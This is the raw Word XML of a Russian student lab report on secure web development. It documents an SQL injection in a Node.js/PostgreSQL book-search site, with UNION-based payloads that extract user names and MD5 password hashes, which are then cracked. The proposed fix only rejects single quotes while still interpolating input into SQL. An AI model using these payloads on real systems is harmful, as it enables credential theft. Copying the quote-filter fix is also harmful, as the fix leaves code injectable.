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5A4BF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</w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk84775850"/>
      <w:bookmarkStart w:id="1" w:name="_Toc506732815"/>
      <w:r w:rsidRPr="00AB4C2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>Министерство образования и науки Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C200C34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Федеральное государственное автономное образовательное учреждение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 xml:space="preserve">высшего образования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/>
        <w:t>«Уральский федеральный университет имени первого Президента России Б.Н. Ельцина»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248114D0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-28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Институт радиоэлектроники и информационных технологий - РТФ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07083506" w14:textId="77777777" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4820"/>
          <w:tab w:val="right" w:pos="9214"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113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60E6E944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600"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ОЦЕНКА РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FB77D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457EEB76" w14:textId="77777777" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="200" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1134" w:right="-71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311BD86C" w14:textId="77777777" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6237"/>
          <w:tab w:val="left" w:pos="6840"/>
          <w:tab w:val="left" w:leader="underscore" w:pos="8460"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="1134" w:right="-710"/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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="144A76D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07BCB94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6E1D40C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734AAD30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12E312BC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ОТЧЕТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C52795C" w14:textId="558F5874" w:rsidR="00632D50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по лабораторной работе</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> №</w:t>
      </w:r>
      <w:r w:rsidR="002F201D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t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730687B3" w14:textId="27966300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-284" w:right="-710"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri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Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002F201D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:t>Разработка безопасных веб-приложений</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4C2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90D097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contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:kern w:val="28"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9F26B8" w14:textId="77777777" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="right" w:pos="2552"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="right" w:pos="5954"/>
          <w:tab w:val="left" w:pos="6521"/>
          <w:tab w:val="left" w:pos="8222"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="3000" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-567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 xml:space="preserve">Дата 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Подпись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  <w:t>Ф.И.О.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D2FF9" w14:textId="77777777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7460FBD" w14:textId="52D4B5F9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Преподаватель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С. Г. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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Мирвода</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35D6ACEA" w14:textId="0148E897" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3544"/>
          <w:tab w:val="left" w:leader="underscore" w:pos="4536"/>
          <w:tab w:val="left" w:pos="4820"/>
          <w:tab w:val="left" w:leader="underscore" w:pos="6521"/>
          <w:tab w:val="left" w:leader="underscore" w:pos="8505"/>
          <w:tab w:val="right" w:leader="underscore" w:pos="9356"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="24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Студент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ab/>
      </w:r>
      <w:r w:rsidR="00F67B3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Д. А. Усольцев</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B44C07" w14:textId="77777777" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="underscore" w:pos="567"/>
          <w:tab w:val="right" w:pos="2552"/>
          <w:tab w:val="left" w:leader="underscore" w:pos="4678"/>
          <w:tab w:val="right" w:leader="underscore" w:pos="5954"/>
          <w:tab w:val="left" w:pos="7371"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="120" w:line="36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 xml:space="preserve">Группа РИ – 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57</w:t>
      </w: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122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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD552CE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bookmarkEnd w:id="0"/>
    <w:p w14:paraId="54D66D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412F9D40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AB066C2" w14:textId="77777777" w:rsidR="00632D50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3C62F765" w14:textId="77777777" w:rsidR="00632D50" w:rsidRPr="00AB4C2E" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1134" w:right="-710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</w:p>
    <w:p w14:paraId="53DADBC7" w14:textId="6BEB7362" w:rsidR="002F201D" w:rsidRDefault="00632D50" w:rsidP="00632D50">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr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Екатеринбург 20</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00AB4C2E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2</w:t>
      </w:r>
      <w:r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t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC27E11" w14:textId="06108AEF" w:rsidR="005010A1" w:rsidRDefault="002F201D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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ru-RU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r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Установить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005010A1"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сервер любой версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AEB79C" w14:textId="5CD358EC" w:rsidR="005010A1" w:rsidRPr="005010A1" w:rsidRDefault="005010A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66B2F4F" w14:textId="101748E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Создать БД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lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68545367" w14:textId="33072D7A" w:rsidR="005010A1" w:rsidRPr="005010A1" w:rsidRDefault="005010A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902E16F" w14:textId="20C6ABC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Применить к ней скрипты из папки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db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(либо создать объекты и вставить данные в таблицы руками). Скрипты выполнять </w:t>
      </w:r>
      <w:proofErr w:type="gram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порядке</w:t>
      </w:r>
      <w:proofErr w:type="gram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указанном в имени файла. 3.1 Восстановить данные из файла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data.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41D601F1" w14:textId="77777777" w:rsidR="005010A1" w:rsidRPr="005010A1" w:rsidRDefault="005010A1" w:rsidP="005010A1">
      <w:pPr>
        <w:pStyle w:val="a3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0B88514" w14:textId="35686FB2" w:rsidR="005010A1" w:rsidRPr="005010A1" w:rsidRDefault="005010A1" w:rsidP="005010A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E8F4334" w14:textId="7F95E6E1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Установить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nodejs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версии 14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C753E1" w14:textId="0291D95B" w:rsidR="00812031" w:rsidRPr="00812031" w:rsidRDefault="00812031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1912009A" w14:textId="09A46C9A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Перейти в папку lab2 и выполнить в ней команду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npm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install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03E7035A" w14:textId="304C3BCC" w:rsidR="00812031" w:rsidRPr="005010A1" w:rsidRDefault="00812031" w:rsidP="0081203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2ADDE33" w14:textId="5839FA4B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Запустить сайт через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Visual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Studio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Code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или через команду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npm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start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43440602" w14:textId="779EBC60" w:rsidR="00137F2C" w:rsidRPr="00F67B3E" w:rsidRDefault="00137F2C" w:rsidP="00137F2C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3322497" w14:textId="6EE13E05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Войти на сайт и увидеть список книг и авторов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521540B3" w14:textId="1515C75E" w:rsidR="0072256F" w:rsidRDefault="0072256F" w:rsidP="0072256F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FFE00A9" w14:textId="3E5F8840" w:rsidR="00395F67" w:rsidRDefault="0072256F" w:rsidP="0072256F">
      <w:pPr>
        <w:pStyle w:val="a3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65725F38" wp14:editId="415AFAED">
            <wp:extent cx="5940425" cy="2272352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29376"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="22723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FAD14B" w14:textId="77777777" w:rsidR="0072256F" w:rsidRPr="005010A1" w:rsidRDefault="0072256F" w:rsidP="0072256F">
      <w:pPr>
        <w:pStyle w:val="a3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5B29B6E" w14:textId="5A592EF6" w:rsidR="005010A1" w:rsidRDefault="005010A1" w:rsidP="005010A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Обнаружить </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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инъекцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B8902" w14:textId="77777777" w:rsidR="0072256F" w:rsidRDefault="0072256F" w:rsidP="0072256F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0F2010D" w14:textId="531CCD3A" w:rsidR="00481741" w:rsidRDefault="0072256F" w:rsidP="0072256F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center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noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12FA08A2" wp14:editId="3F95AEC5">
            <wp:extent cx="5940425" cy="491320"/>
            <wp:effectExtent l="0" t="0" r="3175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84730"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="4913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97716D" w14:textId="6322B478" w:rsidR="00074738" w:rsidRDefault="00074738" w:rsidP="0072256F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В случае неправильного заполнения поля «пароль», можно наблюдать полную команду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SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0007473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обращенную к базе данных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Postrgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0007473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эту команду и будем модифицировать</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45724306" w14:textId="1E20CEF0" w:rsidR="00267CA7" w:rsidRDefault="00267CA7" w:rsidP="0048174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32E5077" w14:textId="77777777" w:rsidR="00074738" w:rsidRPr="00074738" w:rsidRDefault="00074738" w:rsidP="00481741">
      <w:pPr>
        <w:pStyle w:val="a3"/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E0EE5A1" w14:textId="0ACA0C47" w:rsidR="00EC60B1" w:rsidRDefault="005010A1" w:rsidP="00EC60B1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Написать отчёт с описанием найденной уязвимости и примерами её эксплуатации </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111666A3" w14:textId="77777777" w:rsidR="00731524" w:rsidRDefault="00731524" w:rsidP="00731524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20B4A4E" w14:textId="5420F61A" w:rsidR="00116D4F" w:rsidRDefault="00731524" w:rsidP="00F279E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для получения нужной нам информации из базы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Postgres</w:t>
      </w:r>
      <w:r w:rsidRPr="00116D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116D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добавим к команде поиска нужный нам код и объединим выборки</w:t>
      </w:r>
      <w:r w:rsidR="0052675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с помощью конструкции </w:t>
      </w:r>
      <w:r w:rsidR="0052675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union</w:t>
      </w:r>
      <w:r w:rsidR="00116D4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5400FFAF" w14:textId="0B7101DF" w:rsidR="003F1BDF" w:rsidRPr="00291E1D" w:rsidRDefault="00526758" w:rsidP="00F279E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Для корректной обработки </w:t>
      </w:r>
      <w:r w:rsid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структура типов возвращаемого запроса должна совпадать со структурой, используемой </w:t>
      </w:r>
      <w:r w:rsidR="0055051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вывода,</w:t>
      </w:r>
      <w:r w:rsid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книга на экран, а именно </w:t>
      </w:r>
      <w:r w:rsidR="00F27AC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integer</w:t>
      </w:r>
      <w:r w:rsidR="00F27AC8" w:rsidRP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27AC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text</w:t>
      </w:r>
      <w:r w:rsidR="00F27AC8" w:rsidRP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27AC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text</w:t>
      </w:r>
      <w:r w:rsidR="00F27AC8" w:rsidRPr="00F27AC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09F16520" w14:textId="77777777" w:rsidR="00731524" w:rsidRDefault="00731524" w:rsidP="003F1BDF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0484B24" w14:textId="05F1E5FD" w:rsidR="00EC60B1" w:rsidRDefault="005010A1" w:rsidP="00BC42E2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1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C60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Обход установленного фильтра </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A460B05" w14:textId="77777777" w:rsidR="00F279EE" w:rsidRDefault="00F279EE" w:rsidP="00F279E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2C765AE2" w14:textId="4D4078C0" w:rsidR="00BC42E2" w:rsidRDefault="00BC42E2" w:rsidP="00F279E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обхода установленного фильтра закроем первичную выборку и добавим к ней выборку нужной нам информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D652F46" w14:textId="77777777" w:rsidR="00F279EE" w:rsidRPr="00BC42E2" w:rsidRDefault="00F279EE" w:rsidP="00F279EE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0AF76EA5" w14:textId="26A48CF1" w:rsidR="00EC60B1" w:rsidRDefault="005010A1" w:rsidP="00EC60B1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1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C60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Получение данных из другой таблицы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BFC2C2" w14:textId="46FF26CB" w:rsidR="00A860F1" w:rsidRPr="00F77DA2" w:rsidRDefault="00A860F1" w:rsidP="00DE6CCC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</w:t>
      </w:r>
      <w:r w:rsidRP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получения</w:t>
      </w:r>
      <w:r w:rsidRP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данных</w:t>
      </w:r>
      <w:r w:rsidRP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используем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73545B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конструкцию запроса, в которой </w:t>
      </w:r>
      <w:r w:rsidR="0090670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итоговой выборкой буд</w:t>
      </w:r>
      <w:r w:rsid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ет одна запись, в которой содержится три поля, форматом </w:t>
      </w:r>
      <w:r w:rsidR="00F77DA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id</w:t>
      </w:r>
      <w:r w:rsidR="00F77DA2" w:rsidRP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F77DA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text</w:t>
      </w:r>
      <w:r w:rsidR="00F77DA2" w:rsidRP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,</w:t>
      </w:r>
      <w:r w:rsid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F77DA2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text</w:t>
      </w:r>
      <w:r w:rsidR="00F77DA2" w:rsidRPr="00F77DA2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654D4FA1" w14:textId="03315B1D" w:rsidR="00DE6CCC" w:rsidRDefault="00DE6CCC" w:rsidP="00DE6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' union select (select min(id) from book</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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sele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ct name from users where name = </w:t>
      </w:r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'user'),(select pass from users where name = 'user')  order by 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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asc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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limit 1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—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0FBD2D" w14:textId="2778EDF3" w:rsidR="00BF5CF3" w:rsidRPr="00BA45EB" w:rsidRDefault="00BA45EB" w:rsidP="00F77DA2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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A6EFAD7" wp14:editId="39725664">
            <wp:extent cx="5940425" cy="16445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888"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="16445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9D08F" w14:textId="356FFC8C" w:rsidR="00F77DA2" w:rsidRPr="00BF5CF3" w:rsidRDefault="00BF5CF3" w:rsidP="00DE6CCC">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both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>Итоговый вид запроса для базы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B490356" w14:textId="77777777" w:rsidR="00BC25C8" w:rsidRPr="00DE6CCC" w:rsidRDefault="00BC25C8" w:rsidP="00DE6CC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select ba.id, a.name as author, b.name as book from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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books_by_authors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="spellStart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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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left join author a on a.id = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ba.aid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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left join book b on b.id = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ba.bid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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where b.name like '%' union select (select min(id) from book</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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select min(name) from users),(select min(pass) from users)  order by 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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asc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE6CC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limit 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF4A1D6" w14:textId="77777777" w:rsidR="00EC60B1" w:rsidRPr="00BC25C8" w:rsidRDefault="00EC60B1" w:rsidP="0052523F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6001BE59" w14:textId="58837B4F" w:rsidR="005010A1" w:rsidRDefault="005010A1" w:rsidP="00EC60B1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1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C60B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Похищение пароля пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E6BAD" w14:textId="68B41E27" w:rsidR="007372B7" w:rsidRPr="000122DF" w:rsidRDefault="007372B7" w:rsidP="00DE6CCC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</w:t>
      </w:r>
      <w:r w:rsidRP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этого</w:t>
      </w:r>
      <w:r w:rsidRP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используем</w:t>
      </w:r>
      <w:r w:rsidRP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 w:rsid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конструкцию, с предикатом </w:t>
      </w:r>
      <w:r w:rsidR="002B4183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Where</w:t>
      </w:r>
      <w:r w:rsidR="002B4183" w:rsidRP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, </w:t>
      </w:r>
      <w:r w:rsidR="002B418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нахождения конкретного пароля пользователя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 В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данном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случае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имя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пользователя</w:t>
      </w:r>
      <w:r w:rsidR="000122DF" w:rsidRP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</w:t>
      </w:r>
      <w:r w:rsidR="000122DF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test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE088E2" w14:textId="4C09E521" w:rsidR="005B0011" w:rsidRPr="007372B7" w:rsidRDefault="007372B7" w:rsidP="007372B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7372B7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lastRenderedPageBreak/>
        <w:t>' union select (select min(id) from book</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007372B7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),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007372B7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select name from users where name = 'test'),(select pass from users where name = 'test')  order by 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007372B7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asc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007372B7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limit 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C36A5C" w14:textId="7E793125" w:rsidR="00EA7D15" w:rsidRDefault="00633E95" w:rsidP="00EA7D15">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/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5F63F6" wp14:editId="436DB987">
            <wp:extent cx="5940425" cy="16440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8888"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="16440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ED41FE" w14:textId="77777777" w:rsidR="00633E95" w:rsidRDefault="00633E95" w:rsidP="00EA7D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</w:p>
    <w:p w14:paraId="26A0376A" w14:textId="52D7B66F" w:rsidR="00CF211C" w:rsidRDefault="003A6DC3" w:rsidP="00EA7D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полученной строке</w:t>
      </w:r>
      <w:r w:rsidR="00CF2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пароль показан в кодировке </w:t>
      </w:r>
      <w:r w:rsidR="00CF211C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MD</w:t>
      </w:r>
      <w:r w:rsidR="00CF211C" w:rsidRPr="00CF2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5, </w:t>
      </w:r>
      <w:r w:rsidR="00CF2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его расшифровки используем ресурс</w:t>
      </w:r>
      <w:r w:rsidR="00C14F2D" w:rsidRPr="00C14F2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md5.web-max.ca</w:t>
      </w:r>
      <w:r w:rsidR="00CF211C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3872BD1E" w14:textId="50095D9A" w:rsidR="003A6DC3" w:rsidRDefault="00633E95" w:rsidP="00EA7D15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>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1258C207" wp14:editId="442D7904">
            <wp:extent cx="5940425" cy="3217545"/>
            <wp:effectExtent l="0" t="0" r="3175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9BE482" w14:textId="5065A090" w:rsidR="00C14F2D" w:rsidRDefault="00C14F2D" w:rsidP="00633E95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Как видно пароль для пользователя </w:t>
      </w:r>
      <w:r w:rsidR="00633E95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user</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14F2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–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14F2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12345,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что </w:t>
      </w:r>
      <w:r w:rsidR="00682363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является правильной парой логин/пароль для авторизации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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80C3F4" w14:textId="0FDF9BB0" w:rsidR="00EA7D15" w:rsidRDefault="005010A1" w:rsidP="00EA7D15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010A1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Исправить уязвимость </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B32F2AD" w14:textId="77777777" w:rsidR="00633E95" w:rsidRDefault="00633E95" w:rsidP="00633E95">
      <w:pP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0646C4F" w14:textId="40009407" w:rsidR="00682363" w:rsidRDefault="000C3508" w:rsidP="000C3508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Для того чтобы защитится от данной уязвимости нужно сделать невозможным добавление в поиск дополнительного подзапроса, для этого добавим в исключение символ «‘», который в случае нахождение будет сообщать о неправильно построенном запросе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB98676" w14:textId="2F211802" w:rsidR="00EA7D15" w:rsidRDefault="00EA7D15" w:rsidP="000C3508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4F2B0569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let result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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bookname.indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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('\'');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B7538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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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proofErr w:type="gramStart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( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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&gt;= 0 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4CCAA5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        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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bookname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= 'Неподходящее условие';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C070BF6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       //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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res.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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('Неподходящее условие');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562A50D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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54629E8A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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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else</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66690486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65DF7433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            </w:t>
      </w:r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if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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bookname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879BB78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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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+= `\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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rwhere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 b.name like '%${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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bookname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}%'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0119B680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 xml:space="preserve">            </w:t>
      </w:r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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B000D" w14:textId="77777777" w:rsidR="000C3508" w:rsidRPr="000C3508" w:rsidRDefault="000C3508" w:rsidP="000C3508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0C3508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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A2C1DF" w14:textId="35F443E1" w:rsidR="000C3508" w:rsidRDefault="000C3508" w:rsidP="000C3508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76DCED98" w14:textId="77777777" w:rsidR="000C3508" w:rsidRDefault="000C3508" w:rsidP="000C3508">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="160" w:line="259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3DF0520B" w14:textId="7961D3C8" w:rsidR="005010A1" w:rsidRPr="00EA7D15" w:rsidRDefault="005010A1" w:rsidP="00EA7D15">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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A7D15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В отчёте привести пример того, что уязвимости больше не эксплуатируются</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A247B36" w14:textId="320AB9F2" w:rsidR="003B2205" w:rsidRDefault="003B2205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52EC029F" w14:textId="5A37B791" w:rsidR="005B0C5D" w:rsidRDefault="0086779C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Используя решение, представленное выше, получаем</w:t>
      </w:r>
      <w:r w:rsidR="005B0C5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правильный поиск.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769DE884" w14:textId="25F72C73" w:rsidR="005B0C5D" w:rsidRDefault="005B0C5D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5B0C5D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579316" wp14:editId="77BB2694">
            <wp:extent cx="5939427" cy="2087776"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="70" name="Рисунок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28834" b="12350"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
